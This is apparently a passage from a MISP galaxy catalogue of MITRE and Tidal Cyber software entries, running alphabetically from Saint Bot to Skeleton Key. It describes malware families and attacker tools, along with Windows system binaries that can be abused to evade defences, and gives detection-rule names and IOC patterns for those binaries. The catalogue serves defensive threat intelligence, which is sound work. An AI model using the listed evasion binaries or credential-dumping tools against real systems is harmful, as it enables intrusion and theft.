UUID d66e5d18-e9f5-4091-bdf4-acdac129e2e0 which can be used as unique global reference for Saint Bot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1018 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sakula
Sakula is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. [Dell Sakula]
Internal MISP references
UUID a316c704-144a-4d14-8e4e-685bb6ae391c which can be used as unique global reference for Sakula in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0074 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SamSam
SamSam is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.[US-CERT SamSam 2018][Talos SamSam Jan 2018][Sophos SamSam Apr 2018][Symantec SamSam Oct 2018]
Internal MISP references
UUID 88831e9f-453e-466f-9510-9acaa1f20368 which can be used as unique global reference for SamSam in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0370 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Sardonic
Sardonic is a backdoor written in C and C++ that is known to be used by FIN8, as early as August 2021 to target a financial institution in the United States. Sardonic has a plugin system that can load specially made DLLs and execute their functions.[Bitdefender Sardonic Aug 2021][Symantec FIN8 Jul 2023]
Internal MISP references
UUID 9ab0d523-3496-5e64-9ca1-bb756f5e64e0 which can be used as unique global reference for Sardonic in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1085 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to manage services
Author: Oddvar Moe
Paths: * C:\Windows\System32\sc.exe * C:\Windows\SysWOW64\sc.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
Detection: * Sigma: proc_creation_win_susp_service_creation.yml * Sigma: proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml * Sigma: proc_creation_win_sc_service_path_modification.yml * Splunk: sc_exe_manipulating_windows_services.yml * Elastic: lateral_movement_cmd_service.toml * IOC: Unexpected service creation * IOC: Unexpected service modification[Sc.exe - LOLBAS Project]
Internal MISP references
UUID 41be663f-ecc9-4ab6-afeb-c52737f84858 which can be used as unique global reference for Sc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5160 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
schtasks
schtasks is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. [TechNet Schtasks]
Internal MISP references
UUID 2aacbf3a-a359-41d2-9a71-76447f0545b5 which can be used as unique global reference for schtasks in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0111 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'f0c54030-956a-4bac-9f98-deb2349183ac', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Scriptrunner
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute binary through proxy binary to evade defensive counter measures
Author: Oddvar Moe
Paths: * C:\Windows\System32\scriptrunner.exe * C:\Windows\SysWOW64\scriptrunner.exe
Resources: * https://twitter.com/KyleHanslovan/status/914800377580503040 * https://twitter.com/NickTyrer/status/914234924655312896 * https://github.com/MoooKitty/Code-Execution
Detection: * Sigma: proc_creation_win_servu_susp_child_process.yml * IOC: Scriptrunner.exe should not be in use unless App-v is deployed[Scriptrunner.exe - LOLBAS Project]
Internal MISP references
UUID ba4d8522-9656-462e-b25e-32a9bba85a60 which can be used as unique global reference for Scriptrunner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5161 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Scrobj
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Script Component Runtime
Author: Eral4m
Paths: * c:\windows\system32\scrobj.dll * c:\windows\syswow64\scrobj.dll
Resources: * https://twitter.com/eral4m/status/1479106975967240209
Detection: * IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line[Scrobj.dll - LOLBAS Project]
Internal MISP references
UUID 101f7867-9c5c-482e-b26e-9fdb8ff9b2c7 which can be used as unique global reference for Scrobj in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5194 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
SDBbot
SDBbot is a backdoor with installer and loader components that has been used by TA505 since at least 2019.[Proofpoint TA505 October 2019][IBM TA505 April 2020]
Internal MISP references
UUID 046bbd0c-bff5-46fc-9028-cbe46a9f8ec5 which can be used as unique global reference for SDBbot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0461 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SDelete
SDelete is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. [Microsoft SDelete July 2016]
Internal MISP references
UUID 3d4be65d-231b-44bb-8d12-5038a3d48bae which can be used as unique global reference for SDelete in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0195 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SeaDuke
SeaDuke is malware that was used by APT29 from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with CozyCar. [F-Secure The Dukes]
Internal MISP references
UUID ae30d58e-21c5-41a4-9ebb-081dc1f26863 which can be used as unique global reference for SeaDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0053 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seasalt
Seasalt is malware that has been linked to APT1's 2010 operations. It shares some code similarities with OceanSalt.[Mandiant APT1 Appendix][McAfee Oceansalt Oct 2018]
Internal MISP references
UUID 3527b09b-f3f6-4716-9f90-64ea7d3b9d8a which can be used as unique global reference for Seasalt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0345 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SEASHARPEE
SEASHARPEE is a Web shell that has been used by OilRig. [FireEye APT34 Webinar Dec 2017]
Internal MISP references
UUID 42c8504c-8a18-46d2-a145-35b0cd8ba669 which can be used as unique global reference for SEASHARPEE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0185 |
| source | MITRE |
| tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seatbelt
Seatbelt is a tool used to perform numerous security-oriented checks.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 74beac1c-8468-4f1e-8990-11a4eb7b0110 which can be used as unique global reference for Seatbelt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5042 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
secretsdump
According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script "used to extract credentials and other confidential information from a system".[U.S. CISA Rhysida Ransomware November 15 2023] Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.[GitHub secretsdump]
Internal MISP references
UUID a1fef846-cb22-4885-aa14-cb67ab38fce4 which can be used as unique global reference for secretsdump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5072 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '61b7b81d-3f98-4bed-97a9-d6c536b8969b', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
ServHelper
ServHelper is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.[Proofpoint TA505 Jan 2019]
Internal MISP references
UUID 704ed49d-103c-4b33-b85c-73670cc1d719 which can be used as unique global reference for ServHelper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0382 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seth-Locker
Seth-Locker is a ransomware with some remote control capabilities that has been in use since at least 2021. [Trend Micro Ransomware February 2021]
Internal MISP references
UUID fb47c051-d22b-4a05-94a7-cf979419b60a which can be used as unique global reference for Seth-Locker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0639 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Setres
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Configures display settings
Author: Grzegorz Tworek
Paths: * c:\windows\system32\setres.exe
Resources: * https://twitter.com/0gtweet/status/1583356502340870144
Detection: * Sigma: proc_creation_win_lolbin_setres.yml * IOC: Unusual location for choice.exe file * IOC: Process created from choice.com binary * IOC: Existence of choice.cmd file[Setres.exe - LOLBAS Project]
Internal MISP references
UUID ad872ead-f3be-49df-b2f3-2526246acdf5 which can be used as unique global reference for Setres in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5162 |
| source | Tidal Cyber |
| tags | ['d75511ab-cbff-46d3-8268-427e3cff134a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
SettingSyncHost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Host Process for Setting Synchronization
Author: Elliot Killick
Paths: * C:\Windows\System32\SettingSyncHost.exe * C:\Windows\SysWOW64\SettingSyncHost.exe
Resources: * https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
Detection: * Sigma: proc_creation_win_lolbin_settingsynchost.yml * IOC: SettingSyncHost.exe should not be run on a normal workstation[SettingSyncHost.exe - LOLBAS Project]
Internal MISP references
UUID e46a42d6-ca6e-4237-ab66-b0d102a580c7 which can be used as unique global reference for SettingSyncHost in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5163 |
| source | Tidal Cyber |
| tags | ['8929bc83-9ed6-4579-b837-40236b59b383', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Setupapi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Setup Application Programming Interface
Author: LOLBAS Team
Paths: * c:\windows\system32\setupapi.dll * c:\windows\syswow64\setupapi.dll
Resources: * https://github.com/huntresslabs/evading-autoruns * https://twitter.com/pabraeken/status/994742106852941825 * https://windows10dll.nirsoft.net/setupapi_dll.html
Detection: * Sigma: proc_creation_win_rundll32_setupapi_installhinfsection.yml * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___setupapi.yml[Setupapi.dll - LOLBAS Project]
Internal MISP references
UUID e7d450ec-dd29-455f-8d26-f8a563e1e88d which can be used as unique global reference for Setupapi in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5195 |
| source | Tidal Cyber |
| tags | ['da405033-3571-4f98-9810-53d9df1ac0fb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ShadowPad
ShadowPad is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by APT41, but has since been observed to be used by various Chinese threat activity groups. [Recorded Future RedEcho Feb 2021][Securelist ShadowPad Aug 2017][Kaspersky ShadowPad Aug 2017]
Internal MISP references
UUID 5190f50d-7e54-410a-9961-79ab751ddbab which can be used as unique global reference for ShadowPad in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0596 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Shamoon
Shamoon is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. Shamoon has also been seen leveraging RawDisk and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.[Palo Alto Shamoon Nov 2016][Unit 42 Shamoon3 2018][Symantec Shamoon 2012][FireEye Shamoon Nov 2016]
Internal MISP references
UUID 840db1db-e262-4d6f-b6e3-2a64696a41c5 which can be used as unique global reference for Shamoon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0140 |
| source | MITRE |
| tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Shark
Shark is a backdoor malware written in C# and .NET that is an updated version of Milan; it has been used by HEXANE since at least July 2021.[ClearSky Siamesekitten August 2021][Accenture Lyceum Targets November 2021]
Internal MISP references
UUID 278da5e8-4d4c-4c45-ad72-8f078872fb4a which can be used as unique global reference for Shark in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1019 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpChromium
SharpChromium is an open-source software project. According to its GitHub repository, SharpChromium is a ".NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins."[GitHub SharpChromium]
Internal MISP references
UUID 311e8944-2157-4616-8b95-d75020e21c35 which can be used as unique global reference for SharpChromium in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5075 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpDisco
SharpDisco is a dropper developed in C# that has been used by MoustachedBouncer since at least 2020 to load malicious plugins.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID 4ed1e83b-a208-5518-bed2-d07c1b289da2 which can be used as unique global reference for SharpDisco in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1089 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpHound
SharpHound is an open-source software utility incorporated into the BloodHound Active Directory (AD) reconnaissance tool.[GitHub SharpHound] Adversaries have used SharpHound for AD enumeration.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID 0bcf0dae-315f-491f-bc65-b1772ffa31c1 which can be used as unique global reference for SharpHound in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5275 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpRoast
SharpRoast is an open-source tool used to carry out Kerberoasting attacks. According to its GitHub project page, the tool is a C# port of specific functionality included in the PowerView module of the PowerSploit offensive security framework.[GitHub SharpRoast]
Internal MISP references
UUID 54a5c881-c1ad-40d0-88c0-6c32b9ef95cb which can be used as unique global reference for SharpRoast in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5060 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpShares
SharpShares is a tool that can be used to enumerate accessible network shares in a domain. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID a202b37f-5c61-410b-bb14-a3e6b2b82833 which can be used as unique global reference for SharpShares in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5004 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpStage
SharpStage is a .NET malware with backdoor capabilities.[Cybereason Molerats Dec 2020][BleepingComputer Molerats Dec 2020]
Internal MISP references
UUID 564643fd-7113-490e-9f6a-f0cc3f0e1a4c which can be used as unique global reference for SharpStage in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0546 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHARPSTATS
SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[TrendMicro POWERSTATS V3 June 2019]
Internal MISP references
UUID f655306f-f7b4-4eec-9bd6-ac75142fcb43 which can be used as unique global reference for SHARPSTATS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0450 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Shdocvw
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Shell Doc Object and Control Library.
Author: LOLBAS Team
Paths: * c:\windows\system32\shdocvw.dll * c:\windows\syswow64\shdocvw.dll
Resources: * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/997690405092290561 * https://windows10dll.nirsoft.net/shdocvw_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Shdocvw.dll - LOLBAS Project]
Internal MISP references
UUID 67323b8a-e805-4503-8a40-d47f229453a0 which can be used as unique global reference for Shdocvw in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5196 |
| source | Tidal Cyber |
| tags | ['2c0f0b44-9b09-49a0-8dc5-d9fdcc515825', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Shell32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Shell Common Dll
Author: LOLBAS Team
Paths: * c:\windows\system32\shell32.dll * c:\windows\syswow64\shell32.dll
Resources: * https://twitter.com/Hexacorn/status/885258886428725250 * https://twitter.com/pabraeken/status/991768766898941953 * https://twitter.com/mattifestation/status/776574940128485376 * https://twitter.com/KyleHanslovan/status/905189665120149506 * https://windows10dll.nirsoft.net/shell32_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: rundll32_control_rundll_hunt.yml[Shell32.dll - LOLBAS Project]
Internal MISP references
UUID edf31b62-e9db-43c8-b9ef-55afd6b0404c which can be used as unique global reference for Shell32 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5197 |
| source | Tidal Cyber |
| tags | ['e0b9882e-b9bb-4c16-b3d9-9268866eded0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Shimgvw
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Photo Gallery Viewer
Author: Eral4m
Paths: * c:\windows\system32\shimgvw.dll * c:\windows\syswow64\shimgvw.dll
Resources: * https://twitter.com/eral4m/status/1479080793003671557
Detection: * IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line[Shimgvw.dll - LOLBAS Project]
Internal MISP references
UUID 691b3a37-af46-47d2-a027-d93d901e0dac which can be used as unique global reference for Shimgvw in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5198 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ShimRat
ShimRat has been used by the suspected China-based adversary Mofang in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "ShimRat" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. [FOX-IT May 2016 Mofang]
Internal MISP references
UUID a3287231-351f-472f-96cc-24db2e3829c7 which can be used as unique global reference for ShimRat in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0444 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ShimRatReporter
ShimRatReporter is a tool used by suspected Chinese adversary Mofang to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as ShimRat) as well as set up faux infrastructure which mimics the adversary's targets. ShimRatReporter has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.[FOX-IT May 2016 Mofang]
Internal MISP references
UUID 77d9c948-93e3-4e12-9764-4da7570d9275 which can be used as unique global reference for ShimRatReporter in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0445 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SHIPSHAPE
SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 3db0b464-ec5d-4cdd-86c2-62eac9c8acd6 which can be used as unique global reference for SHIPSHAPE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0028 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHOTPUT
SHOTPUT is a custom backdoor used by APT3. [FireEye Clandestine Wolf]
Internal MISP references
UUID 49351818-579e-4298-9137-03b3dc699e22 which can be used as unique global reference for SHOTPUT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0063 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHUTTERSPEED
SHUTTERSPEED is a backdoor used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 5b2d82a6-ed96-485d-bca9-2320590de890 which can be used as unique global reference for SHUTTERSPEED in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0217 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sibot
Sibot is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three Sibot variants in early 2021 during its investigation of APT29 and the SolarWinds Compromise.[MSTIC NOBELIUM Mar 2021]
Internal MISP references
UUID ea0a1282-f2bf-4ae0-a19c-d7e379c2309b which can be used as unique global reference for Sibot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0589 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SideTwist
SideTwist is a C-based backdoor that has been used by OilRig since at least 2021.[Check Point APT34 April 2021]
Internal MISP references
UUID 61227a76-d315-4339-803a-e024f96e089e which can be used as unique global reference for SideTwist in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0610 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SILENTTRINITY
SILENTTRINITY is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. SILENTTRINITY was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.[GitHub SILENTTRINITY March 2022][Security Affairs SILENTTRINITY July 2019]
Internal MISP references
UUID 4765999f-c35e-4a9f-8284-9f10a17e6c34 which can be used as unique global reference for SILENTTRINITY in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0692 |
| source | MITRE |
| type | ['tool'] |
Siloscape
Siloscape is malware that targets Kubernetes clusters through Windows containers. Siloscape was first observed in March 2021.[Unit 42 Siloscape Jun 2021]
Internal MISP references
UUID 8ea75674-cc08-40cf-824c-40eb5cd6097e which can be used as unique global reference for Siloscape in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Containers', 'Windows'] |
| software_attack_id | S0623 |
| source | MITRE |
| tags | ['4fa6f8e1-b0d5-4169-8038-33e355c08bde'] |
| type | ['malware'] |
Skeleton Key
